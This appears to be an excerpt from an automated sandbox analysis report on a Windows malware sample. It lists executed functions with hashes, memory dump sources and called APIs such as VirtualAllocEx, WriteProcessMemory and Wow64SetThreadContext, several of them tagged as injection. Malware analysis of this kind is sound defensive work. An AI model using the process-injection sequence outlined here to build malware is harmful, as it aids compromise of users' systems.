Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: eb8b0cc05bd4a9bf7d847c8738fc91d62a7d41e68baa22bc5a44dbbf427b7824
Instruction ID: 9d7a4211f8227ecd16118b4171e073d7412daf1855e081b270dcf7d7fc2d4636
Opcode Fuzzy Hash: eb8b0cc05bd4a9bf7d847c8738fc91d62a7d41e68baa22bc5a44dbbf427b7824
Instruction Fuzzy Hash: B411E0B6C003498FDB10CF9AC984ADEFBF8EB88324F14845AD529A7650D379A545CFA1

Function 0174D1D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3541436353.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_174d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95159570dd7e1c609e0749b2a508fa1b0e6f91d453174b10e392ea44c6d714c0
Instruction ID: 6aec42f88ae029328be9b35ae710b238794fcb57827b8e62910cb076e995fd9e
Opcode Fuzzy Hash: 95159570dd7e1c609e0749b2a508fa1b0e6f91d453174b10e392ea44c6d714c0
Instruction Fuzzy Hash: 4021F871508200DFDB26DF98D9C4B26FF65FB98324F24C6ADE9494B246C336D416CBA1

Function 0175D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3541524860.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_175d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d5244398d352a1ac1bb147f28683606924a9b667e4001f53d8253594c3ad82
Instruction ID: cfff37c63b071310278a4972a758dc6804591cec1936a363992ec4d9af7a6fc9
Opcode Fuzzy Hash: 74d5244398d352a1ac1bb147f28683606924a9b667e4001f53d8253594c3ad82
Instruction Fuzzy Hash: 55212271604204DFDB65DF98D9C4B26FB65EB88324F20C9ADDC0E4B246C3BAD807CA61

Function 0175D005 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3541524860.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_175d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb51a9aaea12ab7d06ac492cb48e8c8b4c8ffe6808a10e5140b6140e0d568274
Instruction ID: 36436df35a2936030c0f8f9a7253a908a265f735adff1d96f89bb47edd4762c0
Opcode Fuzzy Hash: fb51a9aaea12ab7d06ac492cb48e8c8b4c8ffe6808a10e5140b6140e0d568274
Instruction Fuzzy Hash: 4C21BE755083809FDB13CF24D994B11BF71EB46214F28C5EAD8498F2A7C37A980ACB62

Function 0174D1D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3541436353.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_174d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
Instruction ID: c548e54b2a63fec8827d2bf7f841b737c12fd32b1238f55e15f835bc90eb4c38
Opcode Fuzzy Hash: 9b7ddd7a086731bdfc3d36347521231777b7f6d018e947c39a7212cc8184ef59
Instruction Fuzzy Hash: D421AC76504240CFCB16CF44D984B16FF62FB98320F24C2A9E9484A256C33AD41ACBA1

Analysis Process: nD2ozRD7MN.exePID: 7288, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	261
Total number of Limit Nodes:	18

Executed Functions

Function 072ECD54 Relevance: 11.0, Strings: 8, Instructions: 984
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 072EEE70
Hiq, xrefs: 072EEC52
Hiq, xrefs: 072EF292
PHeq, xrefs: 072EE981
(iq, xrefs: 072EE9AD
Hiq, xrefs: 072EF074
Hiq, xrefs: 072EF0D3
Hiq, xrefs: 072EECB1

Memory Dump Source

Source File: 00000009.00000002.2073720231.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_72e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: (iq$Hiq$Hiq$Hiq$Hiq$Hiq$Hiq$PHeq
API String ID: 0-201796279
Opcode ID: 40db1361163aa9e26e29d02a3fbf029ce94c9e65208e2783c01c5022c4c5b938
Instruction ID: 1952750f894d84236d2a80f54cbad17147a48790b0848f04b3fe237f22f78b42
Opcode Fuzzy Hash: 40db1361163aa9e26e29d02a3fbf029ce94c9e65208e2783c01c5022c4c5b938
Instruction Fuzzy Hash: 7D7202B0B102058FDB54EB78C85466E7BAAEFC9310F658569E10ADB3A5CF30DD42C7A1

Function 072E2106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

D, xrefs: 072E210B

Memory Dump Source

Source File: 00000009.00000002.2073720231.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_72e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: b3069c7ee8de4f06dd85c01997914e6c5badf3d6ccc35c5ea5d13eef451b8256
Instruction ID: cc4f6492c080afb94acea95f0b8fd10b56f7ee2800c7fcb7cc3ae1b915a32aa1
Opcode Fuzzy Hash: b3069c7ee8de4f06dd85c01997914e6c5badf3d6ccc35c5ea5d13eef451b8256
Instruction Fuzzy Hash: A952DCB4A102188FCB64DF29D998B9EBBB6FF89300F1041D9D50AA7365CB359E81CF50

Function 072E6CE8 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2073720231.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_72e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cca0d2024e3d2eb144c1a94c82f190b518aa4525f5e3a4264e3d01c4ad5ccf
Instruction ID: 63dc2c0e8383e60d83c76caa56976bfb90858c65f8e42d3a855f8a3b8b4c357b
Opcode Fuzzy Hash: f7cca0d2024e3d2eb144c1a94c82f190b518aa4525f5e3a4264e3d01c4ad5ccf
Instruction Fuzzy Hash: D5525BB0610605CFCB54DF68C588A5DB7F6FF89314FA585A8E40A9B361DB31ED86CB80

Function 009FD530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009FD5BE
GetCurrentThread.KERNEL32 ref: 009FD5FB
GetCurrentProcess.KERNEL32 ref: 009FD638
GetCurrentThreadId.KERNEL32 ref: 009FD691

Strings

4'eq, xrefs: 009FD509

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'eq
API String ID: 2063062207-1552367303
Opcode ID: c38232ec06d205c02cc9d886fa371643c1fcdb6b69905b38cc962f713b580ba7
Instruction ID: f29c0489c5d5aa7bf61796260b35845d7fe4c346a575df4a396683b0ca7c5ce8
Opcode Fuzzy Hash: c38232ec06d205c02cc9d886fa371643c1fcdb6b69905b38cc962f713b580ba7
Instruction Fuzzy Hash: 856189B09013498FCB14DFAAD948BAEBBF6FF88304F208459E109A7361D7746944CB61

Function 009FD540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009FD5BE
GetCurrentThread.KERNEL32 ref: 009FD5FB
GetCurrentProcess.KERNEL32 ref: 009FD638
GetCurrentThreadId.KERNEL32 ref: 009FD691

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a4c5f6d56b712a80eecd4ec7a6fcd9807d1e88b9e02f521a6be29bdafdbdfc8e
Instruction ID: 9a8e846f197e7cedd8b8dec6c7b8f78ced2ee804681bf5814b699890ef69e22f
Opcode Fuzzy Hash: a4c5f6d56b712a80eecd4ec7a6fcd9807d1e88b9e02f521a6be29bdafdbdfc8e
Instruction Fuzzy Hash: 7A5154B09013498FDB14CFAAD948BAEBBF5EF88314F208459E109A7361D7746944CF65

Function 025A0068 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 025A2795

Strings

d, xrefs: 025A0068

Memory Dump Source

Source File: 00000009.00000002.2055683577.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_25a0000_nD2ozRD7MN.jbxd

Similarity

API ID: MessagePost
String ID: d
API String ID: 410705778-2872634890
Opcode ID: 72c8c405b75fab38236257f40d549fff05d344bed9cef00584b6da38524d59bd
Instruction ID: 52cae0788736c4f7f5175d551591d48d4f09802f912bf7a7952228a7680e2678
Opcode Fuzzy Hash: 72c8c405b75fab38236257f40d549fff05d344bed9cef00584b6da38524d59bd
Instruction Fuzzy Hash: 5011F5B58003499FCB10DF9AD986BDEBBF8FB58320F10845AE918A7200C375A944CFA5

Function 072ED580 Relevance: 2.8, Strings: 2, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHeq, xrefs: 072ED85C
PHeq, xrefs: 072ED6EE

Memory Dump Source

Source File: 00000009.00000002.2073720231.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_72e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: PHeq$PHeq
API String ID: 0-3382621680
Opcode ID: c875eed24ff57db1989d4bbad03f3d65d3a217bacde1c4efc387af162b435fe0
Instruction ID: d7847a66246c03eadba5010f8a869910d7f919775cdc3b247443ca99b3bc7bfd
Opcode Fuzzy Hash: c875eed24ff57db1989d4bbad03f3d65d3a217bacde1c4efc387af162b435fe0
Instruction Fuzzy Hash: 41C103B4B202098FCB19DF68C594A9DBBF6FF89310F5545A8E406AB3A1DB31EC41CB50

Function 059BE984 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059BEBC6

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 95dd92c69bb5353c32977df481eb66ae30d8533115e4abf4f2b23b544fc1aea6
Instruction ID: 0c331132413884efc7d6c7df466ec03bf1d7aa2fa9672424dd38070782cf1801
Opcode Fuzzy Hash: 95dd92c69bb5353c32977df481eb66ae30d8533115e4abf4f2b23b544fc1aea6
Instruction Fuzzy Hash: 7C916D71D00219DFEB24CF68C945BEDBBFABF48310F1481A9E809A7240DBB49985CF91

Function 059BE990 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059BEBC6

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 768ef0ef0c871c1936fbace48caf9227e1f2bb6bf4f697d65cc06b99e1455ad1
Instruction ID: 07f992afd753763763749242e6558a6a97eb196a54caf16583a18d9ce85031fc
Opcode Fuzzy Hash: 768ef0ef0c871c1936fbace48caf9227e1f2bb6bf4f697d65cc06b99e1455ad1
Instruction Fuzzy Hash: ED915C71D00319DFEB24CF69C945BEDBBBABF48310F1481A9E809A7250DBB49985CF91

Function 072EB5D4 Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

(iq, xrefs: 072EBAE2

Memory Dump Source

Source File: 00000009.00000002.2073720231.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_72e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: c75b65fe408eb462935d1be5aaa0693562e2304708b8538d803e4dff059316f7
Instruction ID: 106992a802a5001472edb4e46f00274d785f7ba9688d963d6713b43be19d7dce
Opcode Fuzzy Hash: c75b65fe408eb462935d1be5aaa0693562e2304708b8538d803e4dff059316f7
Instruction Fuzzy Hash: AE1237B4B101068FCB55DF68D498A6D7BF6FF89314F5581A8E4099B362CB31EC86CB90

Function 009FB298 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5405a2cf4b442171a6e9b70b371d9bbbd646a7cc732efe5f4d002c735cc265
Instruction ID: 4872e2ec3215667cefa9c16fb3c4ed66757251b4dc95bcccab8754d4f4b134bf
Opcode Fuzzy Hash: 9d5405a2cf4b442171a6e9b70b371d9bbbd646a7cc732efe5f4d002c735cc265
Instruction Fuzzy Hash: 13817AB0A00B098FDB24DF2AD4417AABBF5FF88304F10892DE55ADBA50D774E945CB91

Function 009F4508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 009F59E9

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b0d759f27493b2ffc0e1d130959f67cce0d5c638c8848c0ad75ad1589daacc9c
Instruction ID: 73198546e9907f4c72f5d88d3a3338bb00deb85f8f3590f84c6ef2d6707ec6f7
Opcode Fuzzy Hash: b0d759f27493b2ffc0e1d130959f67cce0d5c638c8848c0ad75ad1589daacc9c
Instruction Fuzzy Hash: 3441C1B0C00B1DCBDB24CFA9C884B9EBBF5BF48304F20816AD508AB255DB756949CF90

Function 009F592D Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 009F59E9

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 69310cc3b42b458a665c1f88a21d9741549fccadf70d6bf12db0f1a414ba8c0f
Instruction ID: 11366d32d7b8745d8f6b545b1fd76c3a7d18e1c17096941f8014d1e2582100a5
Opcode Fuzzy Hash: 69310cc3b42b458a665c1f88a21d9741549fccadf70d6bf12db0f1a414ba8c0f
Instruction Fuzzy Hash: C141EFB0C00B1DCFDB24CFA9C884A9EBBB5BF49304F24816AD508AB251DB756949CF90

Function 0596BFF0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2066218320.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5960000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: f3e608c0797e5fac1b89156793e90356f09ce43125f2743654f52c5b1bad109a
Instruction ID: 0a2ff36069b89f1fb2151077f12279a6cefc211df556dfbd711050141bdbc6e4
Opcode Fuzzy Hash: f3e608c0797e5fac1b89156793e90356f09ce43125f2743654f52c5b1bad109a
Instruction Fuzzy Hash: 7D3189729043599FCB12CFA9C844ADEBFF8EF49310F14809AF954A7261C33A9854DFA1

Function 059BE700 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059BE798

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e510d85e71584dc4e602ab8d70645243ccbf7c6477ee4b1608f52f61b0d6f28e
Instruction ID: 17d4402595ce6adb7e2aa2d05b84ebfa3f4cca5e93f8eb084df7cd86aedde0f7
Opcode Fuzzy Hash: e510d85e71584dc4e602ab8d70645243ccbf7c6477ee4b1608f52f61b0d6f28e
Instruction Fuzzy Hash: 49213BB59003199FDB10CFA9D9857EEBBF9FF48310F14842AE919A7240D7789944DB60

Function 05968BBC Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0596A2A5,?,?), ref: 0596A357

Memory Dump Source

Source File: 00000009.00000002.2066218320.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5960000_nD2ozRD7MN.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: a2252d96b515d019473701464942a5536870af47797775c3f82914685a580843
Instruction ID: a73bdafb2cf4001b8549c8990a4a9f982d1dff2564cc730983f3fda2b2c522ad
Opcode Fuzzy Hash: a2252d96b515d019473701464942a5536870af47797775c3f82914685a580843
Instruction Fuzzy Hash: 9331C0B5904349DFDB10CF9AD884ADEFBF9FB48320F14842AE919A7610D775A944CFA0

Function 059BE708 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059BE798

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a273700c20881bdee1427175fb14ba9ef983fb67e2147debad6a96277a3d1fbd
Instruction ID: 0ca37fe850a816495928a0533bfa9c1c6b7ba6104fdd967c0a37706f44928712
Opcode Fuzzy Hash: a273700c20881bdee1427175fb14ba9ef983fb67e2147debad6a96277a3d1fbd
Instruction Fuzzy Hash: 54214A759003199FDF10CFA9C985BDEBBF9FF48320F14842AE919A7240D7789944DBA0

Function 0596A2B9 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0596A2A5,?,?), ref: 0596A357

Memory Dump Source

Source File: 00000009.00000002.2066218320.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5960000_nD2ozRD7MN.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 6e29b52e8a62a0ad520cb28d0c0a01f2b8b259a3fae9873365e97ae13ce2f424
Instruction ID: c21a7e6fa933ffe7cb22e4700d73469627a07dafa42b1141c8442c7f65d6b72d
Opcode Fuzzy Hash: 6e29b52e8a62a0ad520cb28d0c0a01f2b8b259a3fae9873365e97ae13ce2f424
Instruction Fuzzy Hash: 8921C0B5D002499FDB10CF9AD984AEEFBF9FF48310F14842AE919A7610D774A944CFA0

Function 059BE7F1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059BE878

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 27eb79aff613e1c45507da7596c891402ed4f5720b81433e960c0eec93554bae
Instruction ID: 02212d208f30c39f950887f9ca536c0c2e9f9ad301f056dca7e9c4db8e182361
Opcode Fuzzy Hash: 27eb79aff613e1c45507da7596c891402ed4f5720b81433e960c0eec93554bae
Instruction Fuzzy Hash: E42139B6D003199FDB10CFA9C981BEEBBF9FF48320F14842AE919A7250C7789541DB64

Function 059BE569 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059BE5EE

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3c132aa25eb8a90d5081b58ca9161fbd35bcf8826eeb80a5fa7e1ab2c47890e5
Instruction ID: e75d37213cf2685c2d3fdb23640a82a5899daa8008a00e5a7eae756ecadcc29c
Opcode Fuzzy Hash: 3c132aa25eb8a90d5081b58ca9161fbd35bcf8826eeb80a5fa7e1ab2c47890e5
Instruction Fuzzy Hash: F22149B5D003198FEB10CFA9C9857EEBBF8EF48324F14842AD419A7241DB789945CFA0

Function 009FD780 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD80F

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f82e1959066c73cf097cbd3b3daf8f41b65a0f19068a8bb1573cdd147669e266
Instruction ID: 713f91a6285f04358fcbef0d25587f6dd014f2925d166375bcbbea184b017e20
Opcode Fuzzy Hash: f82e1959066c73cf097cbd3b3daf8f41b65a0f19068a8bb1573cdd147669e266
Instruction Fuzzy Hash: 6821E5B59012499FDB11CFA9D984ADEBFF5FB48320F14806AE914A3250D3799944CFA1

Function 059BE570 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059BE5EE

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6591710bbbf0e92f7c652e0701f99615bf1000c8302fbca77ecee9a90a96b61e
Instruction ID: d6dae523d055c50ac3e2c62996dc2057cead1f4a1c41ee84c9a7e91405330103
Opcode Fuzzy Hash: 6591710bbbf0e92f7c652e0701f99615bf1000c8302fbca77ecee9a90a96b61e
Instruction Fuzzy Hash: 1A214971D003098FDB10CFAAC9857EEBBF8EF88320F14842AD419A7241DB789944CFA5

Function 059BE7F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059BE878

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3e711db0d32a0712d724e253c97c9dbecabe448dd303a5e48b6c3bc68e2fd5e5
Instruction ID: 2e92d1ba3985db3e504ba79ecd09fc163a25df394e3dee0d9064f3a464a1e1f6
Opcode Fuzzy Hash: 3e711db0d32a0712d724e253c97c9dbecabe448dd303a5e48b6c3bc68e2fd5e5
Instruction Fuzzy Hash: 8A213C71C003599FDB10CF9AC981ADEFBF5FF48310F10842AE919A7250C7789540DB65

Function 009FD788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD80F

Memory Dump Source

Source File: 00000009.00000002.2044085391.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8846924fe748b1067eee0f90095d7e5b19650eca1be4446ad318fdeed7d1773a
Instruction ID: 9c129f7b1157b96806648abb0dbb4666e8b434b896700432273bcabfb05d09e4
Opcode Fuzzy Hash: 8846924fe748b1067eee0f90095d7e5b19650eca1be4446ad318fdeed7d1773a
Instruction Fuzzy Hash: 3721E4B59002089FDB10CF9AD984ADEBFF9FB48320F14801AE918A3310D374A944CFA1

Function 059BE641 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059BE6B6

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 229a74f2ccb1599a20db8fd3e4eb283bfd9ae37b83e8128aff4df136a4592f75
Instruction ID: 7c7dc39c8190fb5301f30f941650083cab22f5bf9d3cd4f78efb52a7ffe9cbcb
Opcode Fuzzy Hash: 229a74f2ccb1599a20db8fd3e4eb283bfd9ae37b83e8128aff4df136a4592f75
Instruction Fuzzy Hash: EF1147769002499FDB10DFAAC945ADEBFF9EF88320F14841AE519A7250CB759540CBA0

Function 0596AF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0596C00A,?,?,?,?,?), ref: 0596C0AF

Memory Dump Source

Source File: 00000009.00000002.2066218320.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5960000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c75648978f36d6b42a4415832e6c32d16285f25928fe7481a8aed86475e331b4
Instruction ID: f989762a1d4373a140383f4423520fb66ab0d3f7b3b1898c0f7c6b03854aebc2
Opcode Fuzzy Hash: c75648978f36d6b42a4415832e6c32d16285f25928fe7481a8aed86475e331b4
Instruction Fuzzy Hash: 88113AB6804349DFDB10CF9AC844BDEBFF8EB48310F14841AE954A7210C375A954DFA5

Function 059BE648 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059BE6B6

Memory Dump Source

Source File: 00000009.00000002.2066724471.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_59b0000_nD2ozRD7MN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9feb2b5b580a5efecd0abff37ab073f3acb234fabc889d3903aff1d03b120de
Instruction ID: 7afa187a651713241f0c3af191dbb261cab20490047ecc6bf2eeb441550c26ab
